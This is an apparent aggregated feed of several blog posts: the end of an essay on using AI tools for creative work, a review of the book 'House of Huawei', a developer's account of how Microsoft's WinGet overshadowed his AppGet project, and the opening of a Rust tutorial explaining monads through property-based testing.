    • For Musicians: Musicians could use AI to analyze song structures, chord progressions, or mixing habits, creating guides for experimenting with new arrangements or identifying sonic blind spots. I asked "what makes a pirate song anyway?" and got a quick useful answer that all my searching on traditional search engines failed to deliver.
    • For Visual Artists/Photographers: Visual artists and photographers could use AI to analyze their compositions, color palettes, or recurring motifs, generating style guides to push their boundaries or refine their signature look.

    I’m no critic of writing, art, music, or photography—that’s an entire skill set I never took the time to develop. Yet by feeding AI samples of my own work, I can generate style guides that highlight my quirks and recurring themes. I see the techniques I use (sometimes unconsciously) laid out in black and white. That’s a huge boost to my self-awareness and lets me focus my practice where it matters most. It’s like having an ultra-patient, high-level creative consultant on call. For example: it pulled some common threads out of my fiction writing like glowy mystery ruins and biomechanical structures. Think leviathans like Moya on the Farscape series. Not so much Borg Cubes. I favor design and elegance over structure-spanning redundancy.

    Of course, you can’t rely on AI to be your creative engine. That spark still has to come from you. But if you view AI as a toolkit—one that shows you patterns in your existing work—you stay firmly in the driver’s seat. It’s no replacement for a sapient critic’s discerning view, but for most of us, that's much of the value.

    AI offers a neutral space to get that initial, unfiltered assessment, which can then inform more nuanced discussions with human peers. It’s not about replacing traditional feedback, but supplementing it, especially when you need consistent input or a perspective given without fear of hurting your feelings. That hesitance toward bluntness is a good and normal way to be in most cases, but devastating for creative growth when it's all you have. An LLM chatbot will be as honest or flattering as you tell it to be.

    Generative AI is also a fantastic research tool and a gateway for quick reflection. It can help you draft and edit, rapidly iterate through possibilities, or quickly get the gist of background material or early-stage ideas. See my Perplexity.ai post for a concrete example.

    We need you because the conversation around AI is often dominated by four major voices:

    • The Bosses, who blurt out sweeping mandates and hang the threat of replacement by AI over employees' heads. Some try to gloss over the potential downsides by mentioning the need for basic income and housing guarantees. And please don't look into their operations or regulate them, you'll get in the way of The Future! Bosses gonna boss and have all the way to and past the introduction of the power loom. Be part of the looming power that holds them accountable.
    • The Swindlers, who promise you’ll become the next boss. Every developer who knows how to tie together a chat app with cloud AI APIs is making one with varying quality, and not all of them are on the level. This would make an excellent pathway for a bad actor to exfiltrate all kinds of data. Stick to reputable people.
    • The Incredulous, content to watch with a skeptical side-eye. It feels safe over there on the side lines, but this stuff is here and it's only going to find its way into more parts of our lives. Be part of the countervailing force that keeps it in check.
    • The Chorus, taking potshots from the sidelines at anyone who tries to engage with the topic. I get it, a lot of the people pushing this stuff early on were assholes, and opinions were set hard because of it. If this feels like it's aimed at you, it's time to take another look.

    All four, in their own ways, risk steering us toward a brain drain we might not recover from—unless we figure out how to take control of these tools.

    Companies have taken to a recent trend of discarding valuable domain expertise by assuming that AI can entirely replace the nuanced insights of human experts. In reality, while AI is a powerful tool, it cannot replicate the deep, context-driven understanding that comes from years of experience. Instead, forward-thinking organizations will and hopefully are capturing and retaining this expertise—ensuring that the knowledge of seasoned professionals remains in-house rather than lost to retirement or moves to new careers.

    We’ve already witnessed this dynamic in hiring: companies post job ads with sky-high expectations yet refuse to invest in training, leaving them scrambling for talent as experienced workers retire or change careers and the pipeline of seasoned professionals dwindles. AI can help train new people, but it can't replace them, and it can't stand in for a good hiring process. Someone has to come along with the fresh ideas and beginner mind that allows people, companies, organizations, and civilization to thrive decade after decade.

    That’s why I’m choosing a more intentional route. AI isn’t here to do the writing for me or pump out my next masterpiece—it’s just an on-call creative assistant. Sure, AI isn't as kind and supportive as a good friend, but it also won’t sidestep honest critique for fear of hurting your feelings. What they lack in emotional intelligence they make up in availability. For example: I completed the drafting process for this article, exploring ideas and focus points and structures, in a day when it normally takes a week or longer. I still handed it to a real human comrade for a beta read once it was to that point.

    Think of it as a sounding board, not just for yourself, but potentially for creative partnerships. Imagine quickly testing out different approaches with a collaborator, using AI to rapidly visualize or prototype ideas before investing heavily in one direction.

    Let's take the future of creativity back into our own hands. This isn't about being swept away by a technological tide; it's about creatives actively steering the ship. Join me in figuring this out – sharing our experiments, insights, and strategies as we navigate this wild ride together.

    Some cloud-based tools to consider:

    • I use ChatGPT, going free when I just need to poke at it sometimes, paying $20 for a month when it's time to power through a project. The few messages a day you get on the free plan go a long way once you get a knack for prompting.
    • T3 chat, developed by a YouTube-famous developer who goes by Theo, has an $8/month paid plan with access to most of the best models and file uploads. The best balance of features and price for most people.
    • Google's Gemini has generous free limits and produces consistently high quality responses. They also offer NotebookLM which is more research-focused.

    Resources

    • 3Blue1Brown's series on neural networks and vcubingx's series focusing on LLMs will get you up to speed. Not strictly necessary to understand, but no artist has been made worse off by understanding their tools in depth.
    • OpenAI released a guide to prompting the new class of models collectively known as "reasoning." Reasoning models, while still LLMs with all the problems they have, are much better.
    • The generative AI page on Wikipedia
    • InvokeAI and LM Studio are two popular ways to run these tools locally. InvokeAI is focused on image generation models. LM Studio has file support, so you can do like I suggested further up and have the models it supports analyze your work. There's also ComfyUI if you like fine-grain control over your image generation.
    • LM Studio does not support commercial use in its terms, but it's the easiest way to get used to this stuff and try out different sizes (like 7B and 1B) and kinds of model like instruct, coding, and math. You can check the LocalLLaMA subreddit for discussion of the latest tools and resources, including finding something that suits your needs best. There's also the old standard AlternativeTo.
    • Hugging Face and CivitAI are the places to go to find models for use cases from general to bizarrely specific.
    • If you don't have a powerful GPU at home, store bought is fine. Running models on cloud hosts is outside my experience, so you'll have to research this one yourself. This goes with the next point: running a model on a dedicated machine learning system is more efficient than running it on your gaming GPU and likely uses less electricity. You can also evaluate their green energy claims.
    • On the stuff I haven't addressed here but will in more detail in future writing: While I have a well-founded and well-tested belief that the training for these models isn't stealing in a legal sense, and that properly used can be less damaging to the environment than not using them, I do understand some people aren't convinced. There are efforts underway to create models using public domain and freely licensed stuff and tooling to enable it at human-scale costs, plus the distillation (using a big general model to train a small task-focused model), RLHF, and synthetic data (curated model outputs put back into the model to adjust statistical weights) methods already used to improve and focus the major models. These efforts make training more accessible, and make it more viable to run local models using electricity generation sources you can account for, and it only gets better from here.

    Prompting tip

    The more you can see the inputs and outputs as blobs of "stuff," the better. If LLMs think, it's not in any way we yet understand. They're probability engines that transform data into different data using weighted probabilities.

    Imagine you're someone with a task for an ancient time sharing machine. You have something you need the machine to produce based on your inputs, and it's very expensive in value terms to run your task instead of someone else's. "Crap in, crap out" applies here and the training data behind this machine means there's a lot of in you have to account for that isn't your own.

    Assumptions and biases are encoded in the model. You can "invoke" other biases and assumptions with a better-specified input. The less you give it, the more it will tend to follow pathways with the highest weights, and that's not going to be the novel or obscure and interesting stuff you can pluck out with the right words.

    Bad: "Write a science fiction story."

    Better: "List all the major subgenres of science fiction. Write a story in [subgenre]."

    Best:

    • "List all the major subgenres of [major genre 1] and [major genre 2]."
    • "List major tropes of [list of chosen subgenres]."
    • "Outline a long short story merging [list of aspects of subgenre one, list of aspects of subgenre two, ...]. First person perspective. Absolutely no robots. Cyborgs are fine. Emphasize [list of tropes]. Deemphasize [list of other tropes]. Throw in some dinosaurs. Make them accurate, refer to the uploaded PDF on accurate dinosaur depictions, but also cool."

    Also: collect studies and references relevant to your work and interests. Save Wikipedia pages as PDF. These come in handy.

    • "Now give me a draft written from the perspective of the original Sherlock Holmes but he's just landed in the middle of this story and has no idea what's going on."

    That's where you find the gems. I had Star Trek's take on Professor Moriarty opine on digital clones once using the same series' own take on the subject to focus it.

    ]]>
    https://kyefox.com/ai-assisted-creativity/ hacker-news-small-sites-43218960 Sat, 01 Mar 2025 13:18:59 GMT
    <![CDATA[Book Review: House of Huawei]]> thread link) | @minhduong243
    March 1, 2025 | https://onepercentamonth.com/2025/02/27/book-review-house-of-huawei/ | archive.org

    House of Huawei, written by Eva Dou, chronicles the foundation and development over the years of Huawei. This is a company at the forefront of technology and one of the largest 5G equipment suppliers, if not the largest, in the world. However, Huawei is marred by controversies. Chinese laws enable the Chinese government to demand any company operating in the country total collaboration in the name of national security. Because Huawei provides telecommunications equipment, other nations, especially those in the West, are concerned that the company is the conduit for Beijing.

    This concern caused Huawei to lose lucrative contracts, face intense scrutiny around the world and suffer commercial bans. The company tried its best to assuage other governments, but to no avail. This failure stems from the fact that Huawei could not show any definitive proof that it could say no to Beijing whenever there is a request for collaboration. Furthermore, Huawei also got into trouble for its business deals in the Middle East, especially with Iran, when sanctions were in effect. For good measure, Huawei was sued by multiple companies for allegedly intellectual properties infringement.

    Huawei was founded by Ren Zhengfei, who was born in Guizhou, China, in 1944. Ren Zhengfei’s father, Ren Moxun, owned a bookstore selling books that were edgy and controversial at the time. In his day job, Ren Moxun worked for the Nationalists, who ruled China at the time and were in a civil war against the Communist Party led by Mao Zedong. Soon, the Japanese retreated from China and the Communists emerged victorious. Because of his work for the Nationalists, Ren Zhengfei’s father was imprisoned for a few years.

    The younger Ren went to college and thanks to the luck of his birth year, he managed to complete an education in heating, gas supply and ventilation engineering, right before Mao Zedong forced every youth to labor in the countryside. Ren Zhengfei’s brother did not have such luck. I wonder what Ren Zhengfei’s life would have been like had he not finished his education.

    Zhengfei joined the military right after college, served multiple roles, volunteered for a difficult project between China and France, and learned about electronics. His fortune changed for the better when Mao died and Deng Xiaopeng took over. Deng Xiaopeng valued scientific research and Ren Zhengfei was soon recognized as one of the top scientists in the country. The family soon moved to Shenzhen, where Ren caught a lucky break. The city allowed the establishment of private technology companies as a pilot program in 1987. Ren, along with his five original partners, soon created Huawei. The rest is history.

    Ren became an entrepreneur at 44 after having 2-3 kids. He is infamous for an insane work ethic. His wife accused him of putting work above his family. He had multiple health issues due to long working hours. Even when it was not safe in countries like Iraq during the attack by the US, Ren Zhengfei and his team still put in the efforts. In addition, Zhengfei had an amazing vision and business acumen. He set up a chip division in secret and kept it away from the spotlight for years. He also pivoted the company to consumer electronics and catapulted Huawei to among the top brands. He chose to prioritize 3G over 2G when 3G was just a novelty. Controversial as it may be, Huawei definitely put in the work to earn its success.

    I found Eva Dou’s work incredibly thoroughly researched. The book is quite long, but it’s intriguing and easy enough to follow. Really recommend it.

    “Ren now exhorted his sales team to develop a “wolf culture.” “Wolves are really powerful,” Ren told his staff. “They have a keen sense of smell, they are very aggressive, and they don’t attack alone but in packs. As soon as one falls, another steps into the breach. They don’t fear sacrifice.” To win orders, they made bold promises. In a memoir, one former Huawei salesman wrote that his manager had instructed him to tell customers a switch would be ready soon when they both knew it would be months. “Do you think it’s better for the customer to doubt the company or to doubt the ability of a single engineer?” his boss had reasoned. Huawei would build a reputation for courting its customers relentlessly, loitering at hotels or airports to catch traveling officials, even waiting outside their homes. In 1995, China officially switched from a six-day workweek to a five-day one, but Huawei’s staff continued to work around the clock.”

    “In any case, Huawei had a reputation for generosity and hospitality within the industry. It paid for government officials and telecom executives to travel the world for conferences and training sessions. When they visited Huawei’s headquarters, they were greeted with lavish feasts. Ren told his sales managers to continue sending birthday cakes to retired telecom experts who had helped Huawei.

    After he left government office, Li Zibin, former mayor of Shenzhen, was visiting the US in 2007 when there was a knock on his hotel door. He opened it to find Ren standing there, inviting him to dinner. Li was stunned. He wrote in his memoir that Ren told him, “That’s just me, Ren Zhengfei. When you were in office for eleven years, our company didn’t invite you to dinner once. But Huawei’s people know to be grateful. You are our benefactor, and now that you are retired, I’m inviting you to dinner.”

    “Since 2007, Huawei had sold not only networking gear itself but also managed services, or outsourced tech support, to operators around the world. This meant that Huawei’s engineers were contractually obligated to be available if a network operator was experiencing problems. With the Arab Spring turning violent, Ren set off across the Middle East to steel his staff’s nerves.

    During his visits to Iraq, Afghanistan, Libya, and Mali, Ren told Huawei employees that while he sympathized with family members’ concerns over their safety, they couldn’t leave their posts without properly handing off their work. “You can’t flee unconditionally,” he said. “Our professional ethos is to maintain the stability of the network.” He reminded them that theirs was a special vocation. “Tofu shops, fried dough stands, and the like can be shut down at any time, but we cannot.” Ren advised his staff that they should “never” interfere in the politics of any country. “If we give up the network’s stability, then even more people will be sacrificed.”

    Huawei helped the Chinese embassy in Turkey facilitate the evacuation of Chinese nationals from Libya, but some of Huawei’s own engineers stayed behind. ”

    “As Huawei’s smartphone business boomed, it began to draw attention to an obscure corner of the company’s business empire. Gadget reviewers began noticing, with intrigue, that some of Huawei’s phones ran on processors designed by Huawei’s in-house HiSilicon label. These chips were surprisingly good for a brand that Huawei did little to promote. The ability of a telecom company to design its own chips reflected an advanced technical level, with few smartphone makers aside from Apple and Samsung able to do so.

    In 2014, reviewers reported that the HiSilicon processor in Huawei’s Honor 6 smartphone was outperforming even the iPhone in certain benchmarks, though it had marked problems in areas like power consumption. “This is a very interesting result,” one reviewer remarked. Ren was wary of HiSilicon getting too much attention. It risked disrupting Huawei’s relationships with third-party chip suppliers like Qualcomm; the companies might start to see Huawei as a rival instead of a partner. HiSilicon was also still a major supplier for the surveillance-camera industry, something Huawei didn’t tend to talk too much about.

    A reporter at China’s national broadcaster, CCTV, once told Ren it was a pity that more people didn’t need to know “about HiSilicon. “Why does the outside world need to know?” Ren replied. “The outside world doesn’t need to know this.”

    “Long before anyone had heard of Ren Zhengfei or Huawei, Wan Runnan had been China’s star entrepreneur in the 1980s, with his company, the Stone Group, touted as “China’s IBM.” Wan had believed that economic change could lead to political change. He had thrown his support behind the pro-democracy protesters in 1989. As a result, he had to flee to France, with an arrest warrant hanging over his head. He was never able to return home.

    Now, decades later and in failing health in Paris, Wan recalled something that had happened one day in the late 1980s, when he was still living in Beijing. Local officials had invited him to dinner. This was unusual. He was usually the one to invite officials to dine, so as to curry favor with the show of hospitality. Over the meal, the officials told Wan that the Ministry of State Security was going to send agents to work undercover at his company in positions dealing with international relations. The officials cast the move to embed these minders as an act of protection for Wan and the company’s other executives, a security measure that would keep them from stumbling into unseen risks in their dealings with foreigners. “You have a lot of international business, which raises security issues for you. There are situations that you don’t understand,” Wan recalled the officials telling him. “They said, ‘We are sending some people over. You can just treat them like regular employees.’ ”

    “This parallel to China’s governance system offers a lens through which an answer to the question of who controls Huawei can finally be hazarded. Here is what we know about China’s government: the collective governance model obscures who, exactly, is making decisions, and this is by design. Many times, it is the core leader making the decisions, due to his centralized power, but esteemed elders often wield considerable influence in the wings. It can even be possible for them to override the nominal leader on decisions. The party’s internal disciplinary mechanism—present for both the government and for Huawei—serves as a powerful stick to keep individual officials in line, as it allows the party to oust those who are ideologically out of step.

    Huawei’s goal, like the party’s, is to ensure its own long-term survival. Achieving this goal requires winning enough buy-in from its workers. But maximizing shareholder value—or individuals’ well-being—is not the end in and of itself. Such a system has strengths and weaknesses. A strength is its ability to accomplish titanic tasks at almost impossible speeds by getting everyone to pull in unison. A weakness is that such a system is “is often strong but brittle, and its success can come at crushing costs for the individuals involved.

    Huawei is a company made in the image of its nation, in all its fearsomeness and flaws, in all its courage and poetry.”

    ]]>
    https://onepercentamonth.com/2025/02/27/book-review-house-of-huawei/ hacker-news-small-sites-43218911 Sat, 01 Mar 2025 13:12:16 GMT
    <![CDATA[The Day AppGet Died (2020)]]> thread link) | @username923409
    March 1, 2025 | https://keivan.io/the-day-appget-died/ | archive.org

    The Day AppGet Died.

    Microsoft released WinGet (Not to be mistaken with AppGet) earlier this week as part of their Build 2020 announcements. For the past few days, I’ve been collecting my thoughts figuring out what actually happened in the past 12 months.

    TLDR; I’m no longer going to be developing AppGet. The client and backend services will go into maintenance mode immediately until August 1st, 2020, at which point they’ll be shut down permanently.

    If you are still interested, here is how AppGet died.

    A year ago (July 3rd, 2019) I got this email from Andrew, a high-level manager at Microsoft,

    Keivan,

    I run the Windows App Model engineering team and in particular the app deployment team. Just wanted to drop you a quick note to thank you for building appget — it’s a great addition to the Windows ecosystem and makes Windows developers life so much easier. We will likely be up in Vancouver in the coming weeks for meetings with other companies but if you had time we’d love to meet up with you and your team to get feedback on how we can make your life easier building appget.

    Naturally, I was excited; my hobby project being noticed by Microsoft was a big deal. I replied, and two months and a few emails later, we finally had a meeting planned on August 20th at Microsoft Vancouver. The meeting was between me, Andrew and another engineering manager in the same product group. I had a great time; we talked about the ideas behind AppGet, what I thought was broken about the current package manager systems in Windows and what I had planned for AppGet’s future. We went out for lunch and talked a bit more about AppGet, Windows Phone, and a few other things, but the outcome of the meeting as far as I understood it was, what can Microsoft do to help? I mentioned some Azure credit would be nice, getting some doc on how the new MSIX packages work and if they could fix a few issues I had with some of their download links.

    Fast forward to next week (August 28th), and I got this email from Andrew,

    Keivan,

    it was a pleasure to meet you and to find out more about appget. I’m following up on the azure startup pricing for you. As you know we are big fans of package managers on Windows and we are looking to do more in that space. My team is growing and part of that is to build a team who is responsible for ensuring package managers and software distribution on Windows makes a big step forward. We are looking to make some significant changes to the way that we enable software distribution on Windows and there’s a great opportunity (well I would say that wouldn’t I?) to help define the future of Windows and app distribution throughout Azure/Microsoft 365.

    With that in mind have you considered spending more time dedicated to appget and potentially at Microsoft?

    Initially, I was a bit hesitant; I didn’t want to go to Microsoft to work on Windows Store, MSI engine or some other app deployment-related stuff. Shortly after, I was assured that I would spend all my time on AppGet. After about a month of prolonged email back and forth, we came to the conclusion that the arrangement will be very similar to an acqui-hire; Microsoft would hire me, AppGet would come with me, and they would decide if they wanted to rename it something else, or it would become Microsoft AppGet.

    Throughout the whole process, I was very unclear on what my role would be at Microsoft. What would my responsibilities be? Who would I report to? Who/anyone would report to me? I tried clearing some of these answers throughout those slow conversations but never got a clear answer.

    After another few months of again very slow email conversations, I was told that the acqui-hire process through BizDev would take a very long time. An alternative to speed up the process would be just to hire me with a “bonus” and then work on migrating the code ownership after the fact. I didn’t have any objections, so we scheduled some meetings/interviews in Redmond.

    I flew to Seattle on December 5th to have a full day of interviews/meetings at Microsoft HQ. I met with four different people; three of the meetings were more like your typical interviews; the meeting with Andrew was more about what we should do once this is all over and how we would migrate AppGet’s process and infrastructure to be able to handle Microsoft’s scale. We talked about some of our options, but in general, I thought everything went well.

    My last meeting ended at around 6 pm. I took an Uber to the airport and was back in Vancouver.

    Until earlier this week when I was given heads up about WinGet’s launch the next day,

    Hi Keivan, I hope you and your family are doing well — BC seems to have a good handle on covid compared to the us.

    I’m sorry that the pm position didn’t work out. I wanted to take the time to tell you how much we appreciated your input and insights. We have been building the windows package manager and the first preview will go live tomorrow at build. We give appget a call out in our blog post too since we believe there will be space for different package managers on windows. You will see our package manager is based on GitHub too but obviously with our own implementation etc. our package manager will be open source too so obviously we would welcome any contribution from you.

    I look forward to talking to you about our package manager once we go live tomorrow. Obviously this is confidential until tomorrow morning so please keep this to yourself. You and chocolatey are the only folks we have told about this in advance.

    Regards
    Andrew

    I wasn’t too surprised; I had figured out months ago that the “Microsoft thing” isn’t happening.

    I waited until the next day to see what this new package manager was going to be like. When I finally saw the announcement and the GitHub repositories, I was shocked? Upset? I wasn’t even sure what I was looking at.

    When I showed it to my friend, the first thing he said was, “They Called it WinGet? are you serious!?” I didn’t even have to explain to him how the core mechanics, terminology, the manifest format and structure, even the package repository’s folder structure, are very inspired by AppGet.

    Am I upset they didn’t hire me? Not really, after visiting the campus, I wasn’t too sure I wanted to work for such a big company, also moving from Canada to the U.S. wasn’t something I was too excited about. Also, throughout the process, at no time I assumed this was done deal.

    Am I upset that Microsoft, a 1.4 trillion-dollar company, finally got their act together and released a decent package manager for their flagship product? No, they should’ve done it years ago. They shouldn’t have screwed Windows Store as badly as they did.

    Realistically, no matter how hard I tried to promote AppGet, it would never grow at the rate a Microsoft solution would. I didn’t create AppGet to get rich or to become famous or get hired by Microsoft. I created AppGet because I thought us Windows users deserved a decent app management experience too.

    What bothers me is how the whole thing was handled. The slow and dreadful communication speed. The total radio silence at the end. But the part that hurts the most was the announcement. AppGet, which is objectively where most ideas for WinGet came from, was only mentioned as another package manager that just happened to exist; While other package managers that WinGet shares very little with were mentioned and explained much more deliberately.

    There is a silver lining. WinGet will be built on a solid foundation and has the potential to succeed. And we neglected Windows users might finally have a decent package manager. —

    Live and learn.

    Edit to clarify some issues,

    May 27th, 2020 19:04 PST

    But AppGet is Open Source

    Code being copied isn't an issue. I knew full well what it meant to release something opensource and I don't regret it one bit. What was copied with no credit is the foundation of the project. How it actually works. If I were the patenting type, this would be the thing you would patent. ps. I don't regret not patenting anything.

    And I don't mean the general concept of package/app managers, they have been done a hundred times. If you look at similar projects across OSes, Homebrew, Chocolaty, Scoop, ninite etc; you'll see they all do it in their own way. However, WinGet works pretty much identical to the way AppGet works.

    Do you want to know how Microsoft WinGet works? go read the article I wrote 2 years ago about how AppGet works.

    I'm not even upset they copied me. To me, that's a validation of how sound my idea was. What upsets me is how no credit was given.

    You should've followed up.

    I did, There was an issue with my travel reimbursement, So I contacted the HR contact and at the same time asked about the Interviews, She told me someone will get back to me about that and they never did. This was on Feb 14th, 2020.

    Subscribe to Keivan Beigi

    Get the latest posts delivered right to your inbox

    Great! Check your inbox and click the link to confirm your subscription.

    Please enter a valid email address!

    ]]>
    https://keivan.io/the-day-appget-died/ hacker-news-small-sites-43218725 Sat, 01 Mar 2025 12:44:55 GMT
    <![CDATA[Demystifying monads in Rust through property-based testing]]> thread link) | @lukastyrychtr
    March 1, 2025 | https://sunshowers.io/posts/monads-through-pbt/ | archive.org

    In programming pedagogy, monads have a place as a mystical object from the functional programming world that’s hard to understand and even harder to explain. The stereotype about monad explanations is that they fall into two buckets: either comparisons to some kind of food item, or throwing complex mathematical jargon at you, what’s the problem?

    But monads aren’t esoteric or magical at all, nor do they only occur in functional programming. In essence, a monad is a design pattern that allows you to chain together operations within a framework. Noticing monadic design can be quite helpful for programmers in any environment, particularly because it’s often undesirable! In many situations, monads have observable tradeoffs, and sometimes (as here) we can even collect concrete data to back this up.

    I’m going to try and explain monads in a way that is:

    • Geared towards Rust developers, with code samples in Rust, though I hope any sufficiently curious programmer can follow along
    • Free of jargon: no mathematical formalism whatsoever
    • Without analogies of any kind, and grounded in real programming problems
    • Non-trivial: focusing on a production-worthy example with objectively measurable implications
    • Practical: with advice all of us coders can use

    In other words, I’m going to try and write the monad tutorial that I personally would have appreciated when I was younger. And I’m going to start at a place that’s unconventional: through property-based testing, where monads have profound performance characteristics.

    Note: While this article’s primary goal is to explain monads, it also serves as a practical introduction to property-based testing and fault injection techniques. If you’re new to these, you’ll find an introduction to both alongside the monad explanation.

    This post consists of five sections:

    1. Property-based testing goes over the basics
    2. Drawing the rest of the owl talks about a complex scenario: using property-based testing to inject faults
    3. Integrated shrinking shows how to reduce inputs of challenging complexity to smaller sizes
    4. Monads, finally is where we introduce monads in this context, and provide data for how costly they can be
    5. Rediscovering structure discusses some ways to mitigate the tradeoffs of monads in property-based testing

    1. Property-based testing#

    Testing is fundamentally about building models for how your code should behave, at just the right level of complexity: they should match the scope of what you’re testing, without going overboard and reinventing the whole system a second time.

    The best explication of this general idea I’ve seen is in this piece by the great Argentinian writer Jorge Luis Borges:

    …In that Empire, the Art of Cartography attained such Perfection that the map of a single Province occupied the entirety of a City, and the map of the Empire, the entirety of a Province. In time, those Unconscionable Maps no longer satisfied, and the Cartographers Guilds struck a Map of the Empire whose size was that of the Empire, and which coincided point for point with it…”

    —On Exactitude in Science, Jorge Luis Borges

    Nothing quite exemplifies testing-as-modeling like property-based testing—an approach where instead of specifying exact examples, you define models in terms of properties, or invariants, that your code should satisfy. Then, you test your models against randomly generated inputs.

    Let’s take a simple example of a sort function, say my_sort, defined over a slice of integers:

    fn my_sort(slice: &mut [u64]) {
        // ...
    }
    

    How should we go about testing it?

    The most common way to do this is to list out a bunch of inputs and ensure they are correctly sorted, through example-based tests.

    #[test]
    fn test_my_sort() {
        let mut input = [1, 2, 0, 2, 0, 5, 6, 9, 0, 3, 1];
        my_sort(&mut input);
        assert_eq!(input, [0, 0, 0, 1, 1, 2, 2, 3, 5, 6, 9]);
    
        // More examples listed out.
    }
    

    Example-based tests are quite valuable, because they are easy to write and quite direct about what happens. But even in a simple example like sorting, it’s easy to imagine cases where your examples don’t quite cover every edge case.

    How can more edge cases be covered? Well, one way to do so is to step back and ask, what is the sort trying to do? The goal of a sort function is to ensure that all the elements are in ascending order. Can we test that directly?

    The first thing we’d need is to get some inputs to test with. All we care about is a list of numbers here, which seems like it should be easy to generate using a random number generator.

    So maybe we write something like:

    #[test]
    fn test_my_sort_2() {
        // Run the test 1024 times.
        for _ in 0..1024 {
            // Generate a random list of, say, 0 to 512 elements, with values
            // between 0 and 10000.
            let input = /* ... */;
    
            let mut output = input.clone();
            // Call the sort function on it.
            my_sort(&mut output);
    
            // Check that all values are in ascending order.
            for i in 1..output.len() {
                assert!(
                    output[i - 1] <= output[i],
                    "input {input:?} failed at index {i}, output {output:?}",
                );
            }
        }
    }
    

    We now have a model of sorting that we’ve written down in code form: any pair of values must be in ascending order. (In this view, example-based tests are also simple models: for input X, the output should be Y.)

    Now, we run the test, and…

    thread 'test_my_sort_2' panicked at tests/tests.rs:33:13:
    input [7496, 2087, 6900, 7927, 3840, 3065, 6472, 1186, 6464, 4512, 251, 5591, 3410, 2033, 5367, 2202, 5544, 2434, 6491, 8999, 9818, 2885, 8683, 1201, 6115, 2584, 2473, 6817, 5765, 5196, 9389, 5799, 9012, 293, 38, 1024, 9569, 4654, 7449, 7389, 8088, 5074, 3110, 938, 4944, 3859, 7368, 8978, 7524, 9503, 7406, 7591, 8213, 6445, 7000, 7354, 8967, 5549, 7935, 1866, 4048, 4043, 8905, 3154, 4771, 2364, 3982, 5088, 7317, 233, 3396, 1810, 3022, 9065, 454, 6181, 8257, 9598, 3982, 920, 5880, 4165, 4164, 930, 560, 9062, 5587, 6271, 5878, 2495, 9055, 3877, 4352, 1228, 8287, 8901, 3442, 373, 3635, 5316, 4423, 7688, 7919, 4465, 8991, 7043, 7696, 6875, 1478, 2428, 5127, 6809, 6175, 1415, 7263, 5145, 4153, 876, 1528, 6781, 5627, 6750, 3665, 2567, 6855, 141, 2144, 4491, 9121, 7982, 4131, 6337, 1926, 8797, 9382, 1702, 9559, 3910, 1715, 6661, 269, 4366, 6185, 5616, 365, 808, 4864, 3657, 9574, 3057, 7760, 6375, 2326, 7273, 6303, 7018, 8988, 6271, 988, 7796, 2390, 1689, 4279, 9586, 151, 9738, 3659, 7064, 1529, 8237, 4211, 2272, 8909, 7638] failed at index 173, output [38, 141, 151, 233, 251, 269, 293, 365, 373, 454, 560, 808, 876, 920, 930, 938, 988, 1024, 1186, 1201, 1228, 1415, 1478, 1528, 1529, 1689, 1702, 1715, 1810, 1866, 1926, 2033, 2087, 2144, 2202, 2272, 2326, 2364, 2390, 2428, 2434, 2473, 2495, 2567, 2584, 2885, 3022, 3057, 3065, 3110, 3154, 3396, 3410, 3442, 3635, 3657, 3659, 3665, 3840, 3859, 3877, 3910, 3982, 3982, 4043, 4048, 4131, 4153, 4164, 4165, 4211, 4279, 4352, 4366, 4423, 4465, 4491, 4512, 4654, 4771, 4864, 4944, 5074, 5088, 5127, 5145, 5196, 5316, 5367, 5544, 5549, 5587, 5591, 5616, 5627, 5765, 5799, 5878, 5880, 6115, 6175, 6181, 6185, 6271, 6271, 6303, 6337, 6375, 6445, 6464, 6472, 6491, 6661, 6750, 6781, 6809, 6817, 6855, 6875, 6900, 7000, 7018, 7043, 7064, 7263, 7273, 7317, 7354, 7368, 7389, 7406, 7449, 7496, 7524, 7591, 7638, 7688, 7696, 7760, 7796, 7919, 7927, 7935, 7982, 8088, 8213, 8237, 8257, 8287, 8683, 8797, 8901, 8905, 8909, 8967, 8978, 8988, 8991, 8999, 9012, 9055, 9062, 9065, 9121, 9382, 9389, 9503, 9559, 9569, 9574, 9586, 9598, 9818, 9738]
    note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
    

    Whoops, looks like the function has a bug. (Scroll the above example to the right!)

    This example is quite unhelpful and hard to understand! It is possible to use this as an input to debug with, but it is quite painful. If we could use automation to turn this test case into a much smaller one that can still reproduce the bug, debugging becomes significantly easier. The process of doing so is called test case shrinking or reduction.

    To recap—property-based testing consists of two components:

    • Test case generation using a source of randomness.
    • On failing a test, shrinking it down to a smaller, more understandable size.

    Implementing a manual shrinker#

    What counts as “smaller”? For a list of numbers, ideally we’d be able to minimize both the number of items in the list and the integers themselves. This suggests an algorithm for how to write a shrinker by hand:

    • First, try and minimize the size of the list using a binary search algorithm. For example:

      • Try the first half of the list against the function.
      • If that exhibits an error, attempt to recursively shrink this half.
      • If that doesn’t work, try it with the last half of the list.
      • If neither work or if the list has 1 or fewer elements, move on to the next step.
    • Once the list has been shrunk, start shrinking the elements within the list, applying binary search to each element.

    After you’re done writing this algorithm, you’re well on your way towards creating the original property-based testing library, QuickCheck. This approach has you write two functions: a generator and a shrinker.

    With this, you can get much more reasonable-looking output:

    input [58, 33] failed at index 1, output [58, 33]
    

    And for relatively simple cases like lists of integers, this kind of shrinking works quite well!

    But we’re not here to test simple cases. We’re here for the difficult ones.

    2. Drawing the rest of the owl#

    A drawing guide with instructions for a front-facing owl face, a side/45° profile view, and a front-facing owl with body. Each series has 6 steps. The instructions are quite helpful, and a subversion of the "draw the rest of the owl" meme.
    Subverting the meme, we’re going to deal with real-world complexity in this section.

    Most real-world sort implementations don’t just work over a list of integers. They’re written to be polymorphic over anything which can be sorted. In Rust parlance, this means anything that implements the Ord trait; and even if not, a custom comparator function can be provided.

    But Ord can be written by hand, and custom comparators are virtually always written by hand.

    One immediate consequence is that it’s possible that the comparator function says two elements are equal, but they are actually different. In that case, should the order of elements be preserved?

    • A sort implementation which preserves the order is called a stable sort.
    • An implementation which does not is called an unstable sort.

    Unstable sorts tend to be faster than stable ones, and there are valid reasons for preferring each at different times. (The Rust standard library has separate implementations for stable and unstable sorts.)

    Additionally, hand-written implementations mean users can make mistakes! A production-grade sort algorithm must behave reasonably in the face of arbitrary user input, not just in the actual elements being sorted but also in the comparator function (full credit to Lukas Bergdoll for his extensive research here):

    • Ord safety: Users can write a comparator that’s simply incorrect. An easy way is to introduce a difference between ordering and equality, for example by returning Ordering::Less for two elements that are actually equal. Users could also return different answers for the same comparison when called at different times1.

